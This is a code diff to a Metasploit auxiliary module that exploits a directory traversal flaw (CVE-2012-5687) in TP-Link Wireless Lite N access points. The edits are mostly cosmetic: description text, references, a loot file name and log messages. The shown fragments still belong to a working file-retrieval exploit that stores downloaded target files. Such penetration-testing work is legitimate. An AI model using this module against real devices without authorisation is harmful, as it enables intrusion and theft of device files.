@@ -14,17 +14,19 @@ class Metasploit3 < Msf::Auxiliary
14
14
15
15
def initialize
16
16
super (
17
- 'Name' => 'TP-Link Wireless Lite N Access Point - Directory Traversal Vulnerability' ,
17
+ 'Name' => 'TP-Link Wireless Lite N Access Point Directory Traversal Vulnerability' ,
18
18
'Description' => %q{
19
- This module tests whether a directory traversal vulnerablity is present
20
- in versions of TP-Link Access Point 3.12.16 Build 120228 Rel.37317n
21
- } ,
19
+ This module tests whether a directory traversal vulnerability is present in
20
+ versions of TP-Link Access Point 3.12.16 Build 120228 Rel.37317n.
21
+ } ,
22
22
'References' =>
23
23
[
24
- [ 'URL ' , 'http://www.tp-link.com/en/support/download/?model=TL-WA701ND&version=V1 ' ] ,
25
- [ 'URL ' , 'http://www.s3cur1ty.de/m1adv2013-011 ' ] ,
24
+ [ 'CVE ' , '2012-5687 ' ] ,
25
+ [ 'OSVDB ' , '86881 ' ] ,
26
26
[ 'BID' , '57969' ] ,
27
- [ 'EDB' , '24504' ]
27
+ [ 'EDB' , '24504' ] ,
28
+ [ 'URL' , 'http://www.tp-link.com/en/support/download/?model=TL-WA701ND&version=V1' ] ,
29
+ [ 'URL' , 'http://www.s3cur1ty.de/m1adv2013-011' ]
28
30
] ,
29
31
'Author' => [ 'm-1-k-3' ] ,
30
32
'License' => MSF_LICENSE
@@ -81,7 +83,7 @@ def find_files(file)
81
83
:method => "GET"
82
84
} )
83
85
84
- loot = store_loot ( "lfi .data" , "text/plain" , rhost , res . body , file )
86
+ loot = store_loot ( "tplink.traversal .data" , "text/plain" , rhost , res . body , file )
85
87
vprint_good ( "#{ rhost } :#{ rport } - File #{ file } downloaded to: #{ loot } " )
86
88
87
89
if datastore [ 'VERBOSE' ] == true
@@ -117,7 +119,7 @@ def find_files(file)
117
119
def run_host ( ip )
118
120
119
121
begin
120
- print_status ( "#{ rhost } :#{ rport } - connecting " )
122
+ vprint_status ( "#{ rhost } :#{ rport } - Fingerprinting... " )
121
123
res = send_request_cgi (
122
124
{
123
125
'method' => 'GET' ,
0 commit comments